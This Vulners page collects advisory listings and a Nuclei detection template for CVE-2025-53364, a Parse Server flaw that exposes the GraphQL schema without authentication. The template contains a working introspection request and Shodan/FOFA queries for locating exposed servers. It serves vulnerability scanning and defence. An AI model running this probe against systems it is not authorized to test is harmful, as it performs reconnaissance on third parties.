| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2025-53364 | 23 Aug 202521:02 | – | circl | |
| Parse Server 安全漏洞 | 10 Jul 202500:00 | – | cnnvd | |
| CVE-2025-53364 | 10 Jul 202515:18 | – | cve | |
| CVE-2025-53364 Parse Server exposes the data schema via GraphQL API | 10 Jul 202515:18 | – | cvelist | |
| EUVD-2025-21001 | 3 Oct 202520:07 | – | euvd | |
| Parse Server exposes the data schema via GraphQL API | 10 Jul 202516:50 | – | github | |
| CVE-2025-53364 | 10 Jul 202516:15 | – | nvd | |
| BIT-PARSE-2025-53364 Parse Server exposes the data schema via GraphQL API | 16 Jul 202508:08 | – | osv | |
| CVE-2025-53364 Parse Server exposes the data schema via GraphQL API | 10 Jul 202515:18 | – | osv | |
| GHSA-48Q3-PRGV-GM4W Parse Server exposes the data schema via GraphQL API | 10 Jul 202516:50 | – | osv |
id: CVE-2025-53364
info:
name: Parse Server - GraphQL Schema Information Disclosure
author: securitytaters
severity: medium
description: |
The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.
impact: |
Unauthenticated attackers can access GraphQL schema metadata without authentication, potentially expanding the attack surface through exposure of API structure and query capabilities.
remediation: |
Upgrade Parse Server to the latest version that requires authentication for GraphQL schema introspection.
reference:
- https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
- https://www.miggo.io/vulnerability-database/cve/CVE-2025-53364
- https://nvd.nist.gov/vuln/detail/CVE-2025-53364
metadata:
verified: true
max-request: 1
vendor: parseplatform
product: parse-server
shodan-query:
- http.title:"parse server" || "parse-server"
- http.title:"parse dashboard"
fofa-query: title="parse dashboard"
tags: cve,cve2025,parse,graphql,exposure,vuln,vkev
variables:
appid: "{{appid}}"
http:
- raw:
- |
POST /graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-Parse-Application-Id: {{appid}}
{"query":"{\n __schema {\n types {\n name\n }\n }\n}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"data":{"__schema":{"types":[{"name":"Upload"},'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402202e66fd1e90e8b2fd24840e3561605488bd80c7adb7d2c1ae6a7d4a62255a2ed4022007774c9c5716f3c2bdd43748669e2b36261219159ecd2ef03ab03929fb0cfd99:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation